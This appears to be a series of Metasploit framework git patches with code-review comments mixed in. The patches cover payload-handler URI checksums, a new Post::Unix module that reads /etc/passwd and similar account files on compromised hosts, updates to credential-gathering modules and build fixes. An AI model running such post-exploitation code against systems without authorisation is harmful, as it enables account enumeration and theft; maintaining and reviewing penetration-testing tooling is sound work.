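Review bot: `generate_uri_checksum` is now identical in reverse_http.rb and reverse_https.rb, so every correction has to be made twice, as this commit itself shows. It would be better placed in one shared helper that both handlers call. The `32` is unexplained; a comment such as `# 32 attempts x 62 candidate characters; raises if no 4-character URI sums to +sum+` would document the limit the commit message describes. `chk` is rebuilt on every call and could be a frozen constant.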
diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index da94a3f670..1293cd7f5e 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -66,9 +66,12 @@ module ReverseHttps # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - uri = Rex::Text.rand_text_alphanumeric(3) - ("a".."z").sort_by {rand}.each do |x| - return(uri + x) if Rex::Text.checksum8(uri + x) + chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a + 32.times do + uri = Rex::Text.rand_text_alphanumeric(3) + chk.sort_by {rand}.each do |x| + return(uri + x) if Rex::Text.checksum8(uri + x) == sum + end end raise RuntimeError, "Unable to generate a string with checksum #{sum}" end From cd3b96b919a1afabd7f1d4594b0dfd8c2ae49592 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 27 Mar 2012 09:39:50 -0600 Subject: [PATCH 35/46] Add a simple test for unix shells --- test/modules/post/test/unix.rb | 50 ++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 test/modules/post/test/unix.rb diff --git a/test/modules/post/test/unix.rb b/test/modules/post/test/unix.rb new file mode 100644 index 0000000000..8aefada1eb --- /dev/null +++ b/test/modules/post/test/unix.rb 
@@ -0,0 +1,50 @@ + +require 'module_test' + +#load 'test/lib/module_test.rb' +#load 'lib/rex/text.rb' +#load 'lib/msf/core/post/linux/system.rb' +#load 'lib/msf/core/post/unix/enum_user_dirs.rb' + +class Metasploit4 < Msf::Post + + include Msf::ModuleTest::PostTest + include Msf::Post::Linux::System + include Msf::Post::Unix + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Testing remote unix system manipulation', + 'Description' => %q{ This module will test Post::File API methods }, + 'License' => MSF_LICENSE, + 'Author' => [ 'egypt'], + 'Version' => '$Revision$', + 'Platform' => [ 'linux', 'java' ], + 'SessionTypes' => [ 'meterpreter', 'shell' ] + )) + end + + def test_unix + it "should list users" do + ret = true + users = get_users + ret &&= users.kind_of? Array + ret &&= users.length > 0 + have_root = false + if ret + users.each { |u| + next unless u[:name] == "root" + have_root = true + } + end + ret + ret &&= have_root + + ret + end + + end + +end + From 6de7d5aac75257e0f26742157286963d7fedf4fe Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 27 Mar 2012 10:05:42 -0600 Subject: [PATCH 36/46] Remove loads --- test/modules/post/test/file.rb | 8 +++++--- test/modules/post/test/railgun_reverse_lookups.rb | 1 - 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/test/modules/post/test/file.rb b/test/modules/post/test/file.rb index 7354176c17..cd5d1723da 100644 --- a/test/modules/post/test/file.rb +++ b/test/modules/post/test/file.rb @@ -1,7 +1,9 @@ -#require 'module_test' -load 'test/lib/module_test.rb' + +require 'module_test' + +#load 'test/lib/module_test.rb' #load 'lib/rex/text.rb' -load 'lib/msf/core/post/file.rb' +#load 'lib/msf/core/post/file.rb' class Metasploit4 < Msf::Post diff --git a/test/modules/post/test/railgun_reverse_lookups.rb b/test/modules/post/test/railgun_reverse_lookups.rb index d921cbcf76..86b8efbde7 100644 --- a/test/modules/post/test/railgun_reverse_lookups.rb 
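Review bot: The `'Description'` says this module tests `Post::File` API methods, but its only test, `test_unix`, exercises `get_users`. It looks copied from the file test and should read something like `%q{ This module will test Post::Unix API methods }`. The bare `ret` statement just before `ret &&= have_root` has no effect and can be removed. The root lookup loop can be written as `have_root = users.any? { |u| u[:name] == "root" }`.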
+++ b/test/modules/post/test/railgun_reverse_lookups.rb @@ -12,7 +12,6 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/railgun' -load 'lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb' class Metasploit3 < Msf::Post From 812457fed0493e2bc9c6bc5efd35f4dc5ead53f3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 27 Mar 2012 10:52:16 -0600 Subject: [PATCH 37/46] Rename enum_user_dirs --- lib/msf/core/post/unix.rb | 81 +++++++++++++++++++ lib/msf/core/post/unix/enum_user_dirs.rb | 33 -------- .../post/multi/gather/fetchmailrc_creds.rb | 2 +- modules/post/multi/gather/netrc_creds.rb | 2 +- 4 files changed, 83 insertions(+), 35 deletions(-) create mode 100644 lib/msf/core/post/unix.rb delete mode 100644 lib/msf/core/post/unix/enum_user_dirs.rb diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb new file mode 100644 index 0000000000..f39dc7b54a --- /dev/null +++ b/lib/msf/core/post/unix.rb 
@@ -0,0 +1,81 @@ + +module Msf +class Post +module Unix + + # Returns an array of hashes each representing a user + # Keys are name, uid, gid, info, dir and shell + def get_users + users = [] + etc_passwd = nil + [ + "/etc/passwd", + "/etc/security/passwd", + "/etc/master.passwd", + ].each { |f| + if file_exist?(f) + etc_passwd = f + break + end + } + cmd_out = read_file(etc_passwd).split("\n") + cmd_out.each do |l| + entry = {} + user_field = l.split(":") + entry[:name] = user_field[0] + entry[:uid] = user_field[2] + entry[:gid] = user_field[3] + entry[:info] = user_field[4] + entry[:dir] = user_field[5] + entry[:shell] = user_field[6] + users << entry + end + return users + end + + # Returns an array of hashes each hash representing a user group + # Keys are name, gid and users + def get_groups + groups = [] + cmd_out = read_file("/etc/group").split("\n") + cmd_out.each do |l| + entry = {} + user_field = l.split(":") + entry[:name] = user_field[0] + entry[:gid] = user_field[2] + entry[:users] = user_field[3] + groups << entry + end + return groups + end + + # returns all user directories found + def enum_user_directories + user_dirs = [] + + # get all user directories from /etc/passwd + read_file("/etc/passwd").each_line do |passwd_line| + user_dirs << passwd_line.split(/:/)[5] + end + + # also list other common places for home directories in the event that + # the users aren't in /etc/passwd (LDAP, for example) + case session.platform + when 'osx' + user_dirs << cmd_exec('ls /Users').each_line.map { |l| "/Users/#{l}" } + else + user_dirs << cmd_exec('ls /home').each_line.map { |l| "/home/#{l}" } + end + + user_dirs.flatten! + user_dirs.sort! + user_dirs.uniq! + user_dirs.compact! + + user_dirs + end + +end +end +end + diff --git a/lib/msf/core/post/unix/enum_user_dirs.rb b/lib/msf/core/post/unix/enum_user_dirs.rb deleted file mode 100644 index 0bd7768d8c..0000000000 --- a/lib/msf/core/post/unix/enum_user_dirs.rb +++ /dev/null 
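Review bot: In `get_users`, if none of the three candidate files exists, `etc_passwd` stays nil and `read_file(etc_passwd)` is called with nil; a guard such as `return users unless etc_passwd` before the read would return an empty list instead. The parser also applies the seven-field `/etc/passwd` layout to every candidate, whereas `/etc/master.passwd` on BSD systems carries extra fields, so `:info`, `:dir` and `:shell` would likely be wrong there; that deserves a comment or a per-file field map. Separately, the deleted enum_user_dirs.rb had `include ::Msf::Post::Common` and the new module does not, although `enum_user_directories` still calls `cmd_exec`; if that is deliberate, a comment naming the mixins an including module must provide would help.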
@@ -1,33 +0,0 @@ -module Msf -class Post -module Unix - include ::Msf::Post::Common - - # returns all user directories found - def enum_user_directories - user_dirs = [] - - # get all user directories from /etc/passwd - read_file("/etc/passwd").each_line do |passwd_line| - user_dirs << passwd_line.split(/:/)[5] - end - - # also list other common places for home directories in the event that - # the users aren't in /etc/passwd (LDAP, for example) - case session.platform - when 'osx' - user_dirs << cmd_exec('ls /Users').each_line.map { |l| "/Users/#{l}" } - else - user_dirs << cmd_exec('ls /home').each_line.map { |l| "/home/#{l}" } - end - - user_dirs.flatten! - user_dirs.sort! - user_dirs.uniq! - user_dirs.compact! - - user_dirs - end -end -end -end diff --git a/modules/post/multi/gather/fetchmailrc_creds.rb b/modules/post/multi/gather/fetchmailrc_creds.rb index 1d95571620..088a3ce749 100644 --- a/modules/post/multi/gather/fetchmailrc_creds.rb +++ b/modules/post/multi/gather/fetchmailrc_creds.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/file' -require 'msf/core/post/unix/enum_user_dirs' +require 'msf/core/post/unix' class Metasploit3 < Msf::Post diff --git a/modules/post/multi/gather/netrc_creds.rb b/modules/post/multi/gather/netrc_creds.rb index 20fcf7a8ce..a1ef931bff 100644 --- a/modules/post/multi/gather/netrc_creds.rb +++ b/modules/post/multi/gather/netrc_creds.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/file' -require 'msf/core/post/unix/enum_user_dirs' +require 'msf/core/post/unix' class Metasploit3 < Msf::Post From 64b0f50baabf88a473e6e7326e0e731b2abbb4d1 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 27 Mar 2012 15:29:28 -0500 Subject: [PATCH 38/46] Update for compatibility --- external/ruby-lorcon2/Lorcon2.c | 4 +++- external/ruby-lorcon2/extconf.rb | 8 ++++++-- 2 files changed, 9 insertions(+), 3 deletions(-) 
diff --git a/external/ruby-lorcon2/Lorcon2.c b/external/ruby-lorcon2/Lorcon2.c index beb51e0f28..226b6cc773 100644 --- a/external/ruby-lorcon2/Lorcon2.c +++ b/external/ruby-lorcon2/Lorcon2.c @@ -151,7 +151,9 @@ static VALUE Lorcon_create(int argc, VALUE *argv, VALUE self) { obj = Data_Make_Struct(cDevice, struct rldev, 0, Lorcon_free, rld); rld->context = lorcon_create(intf, dri); - lorcon_set_timeout(rld->context, 100); + + // Obsolete: XXX + // lorcon_set_timeout(rld->context, 100); if (rld->context == NULL) { rb_raise(rb_eRuntimeError, diff --git a/external/ruby-lorcon2/extconf.rb b/external/ruby-lorcon2/extconf.rb index 3dd95721b2..955244f708 100644 --- a/external/ruby-lorcon2/extconf.rb +++ b/external/ruby-lorcon2/extconf.rb @@ -1,12 +1,16 @@ #!/usr/bin/env ruby require 'mkmf' -if ( RUBY_VERSION =~ /^1\.9/ ) + +$CFLAGS += " -I/usr/include/lorcon2" + +if ( RUBY_VERSION =~ /^(1\.9|2\.0)/ ) $CFLAGS += " -DRUBY_19" end -if (have_library("orcon2", "lorcon_list_drivers", "lorcon2/lorcon.h") or find_library("orcon2", "lorcon_list_drivers", "lorcon2/lorcon.h")) +if find_library("orcon2", "lorcon_list_drivers", "lorcon2/lorcon.h") create_makefile("Lorcon2") else puts "Error: the lorcon2 library was not found, please see the README" end + From 5248ec87b5492e489164d7ac6ffd6b1468e8f681 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 27 Mar 2012 16:49:20 -0500 Subject: [PATCH 39/46] Fixing EDB reference --- modules/exploits/unix/http/freepbx_callmenum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb index f279d0140a..01cfaecdae 100644 --- a/modules/exploits/unix/http/freepbx_callmenum.rb +++ b/modules/exploits/unix/http/freepbx_callmenum.rb 
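Review bot: The `lorcon_set_timeout` call is left behind as commented-out code under `// Obsolete: XXX`, which does not say why it was dropped or whether a capture timeout is still set some other way. Either delete the line or replace the marker with the reason, for example `/* lorcon_set_timeout() dropped: not provided by current lorcon2 */`, with the wording to be confirmed by the author. The body of `Lorcon_create` continues outside this hunk.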
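Review bot: mkmf's `find_library` takes library search paths after the function name, not a header, so `"lorcon2/lorcon.h"` is being passed as a directory here. With the `have_library` branch removed, detection now rests on that call alone. If the header is meant to be checked too, `have_library("orcon2", "lorcon_list_drivers", "lorcon2/lorcon.h")` is the form that accepts it, though the author may have dropped it for a reason not visible here. The hard-coded `-I/usr/include/lorcon2` and the `/^(1\.9|2\.0)/` match will both need editing for other install prefixes and later Ruby versions, and a comment saying so would save the next person a search.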
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'http://www.exploit-db.com/exploits/18649/' ] + [ 'EDB', '18649' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, From f1d66b941ef235fbe8d7f4664ecc973655dbd0b6 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Tue, 27 Mar 2012 20:01:37 -0400 Subject: [PATCH 40/46] Armitage 03.28.12. Mostly performance improvements. --- data/armitage/armitage.jar | Bin 2861424 -> 2868473 bytes data/armitage/whatsnew.txt | 24 ++++++++++++++++++++++++ 2 files changed, 24 insertions(+) 
diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index afa7246e0023191b1e23215c90949dc3ed76c4ae..02e92a3125c73293742abad4176a30ecd5fb8bf5 100755 GIT binary patch delta 118178 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 